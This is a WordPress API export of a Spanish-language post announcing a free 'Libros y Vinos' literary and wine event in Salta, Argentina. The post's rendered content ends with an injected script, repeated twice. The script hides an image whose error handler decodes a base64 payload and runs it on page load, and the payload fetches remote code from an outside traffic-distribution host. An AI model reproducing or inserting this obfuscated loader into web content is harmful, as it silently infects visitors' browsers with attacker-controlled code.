{"id":3202,"date":"2023-10-24T15:54:45","date_gmt":"2023-10-24T18:54:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3202"},"modified":"2025-08-14T00:06:52","modified_gmt":"2025-08-14T03:06:52","slug":"edicion-especial-de-libros-y-vinos-en-el-mercado-artesanal-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3202","title":{"rendered":"Edici\u00f3n especial de Libros y Vinos en el Mercado Artesanal de Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#b20553\"><em>Un encuentro especial tendr\u00e1 lugar el jueves 26 de octubre a partir de las 19 horas, con la presentaci\u00f3n del Primer Alfajor de Autor de Harina de Torront\u00e9s Salte\u00f1o, campe\u00f3n nacional, y la narrativa \u201cAntolog\u00eda de Escritores de Salta\u201d. Entrada gratuita.<\/em><\/h4>\n\n\n\n<p>El Mercado Artesanal de Salta en forma conjunta con la Sociedad Argentina de Escritores (SADE) filial Salta, llevan a cabo la iniciativa \u201cLibros y Vinos\u201d, una propuesta que propicia un ambiente agradable de lectura, permitiendo al p\u00fablico emprender un viaje literario en el que el vino y el libro se unen para relajar y disfrutar las obras.<\/p>\n\n\n\n<p>En esta oportunidad, la SADE presenta \u201cAntolog\u00eda de Escritores de Salta\u201d, una obra con voces y matices provenientes de las diversas regiones de la Provincia, que van desde la Puna hasta los Valles, de los m\u00e9danos a las yungas. Una producci\u00f3n de textos que busca un lugar en la literatura nacional a trav\u00e9s de sus reconocidos socios.<\/p>\n\n\n\n<p>Con una propuesta especial y diferente, se presentar\u00e1 el Primer Alfajor de Autor de Harina de Torront\u00e9s Salte\u00f1o, elaborado por K\u00b4OA y Orusun en el Concurso Nacional de la Asociaci\u00f3n de Cocina Regional Argentina \u201cBuscando el Mejor Alfajor Argentino\u201d, celebrado en la ciudad de Mar del Plata. Exponen Chef Norma Azar de Sabor Azar y Sabor a Mi Tierra Salta, y Marcelo Reyna, t\u00e9cnico universitario en Energ\u00eda Solar, socio fundador de Orusun y K\u00b4oa Orusun.<\/p>\n\n\n\n<p>La cita ser\u00e1 el jueves 26 de octubre a las 19 horas en el Sal\u00f3n de Usos M\u00faltiples \u201cMar\u00eda Gertrudis Medeiros\u201d del Mercado Artesanal, Av. San Mart\u00edn 2555, con entrada gratuita.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/edicion-especial-de-libros-y-vinos-en-el-mercado-artesanal-de-salta-92480\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Un encuentro especial tendr\u00e1 lugar el jueves 26 de octubre a partir de las 19 horas, con la presentaci\u00f3n del Primer Alfajor de Autor de Harina de Torront\u00e9s Salte\u00f1o, campe\u00f3n nacional, y la narrativa \u201cAntolog\u00eda de Escritores de Salta\u201d. Entrada gratuita. El Mercado Artesanal de Salta en forma conjunta con la Sociedad Argentina de Escritores [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3205,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,26],"tags":[],"class_list":{"0":"post-3202","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3202"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3202"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3202\/revisions"}],"predecessor-version":[{"id":6941,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3202\/revisions\/6941"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3205"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3202"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3202"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3202"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}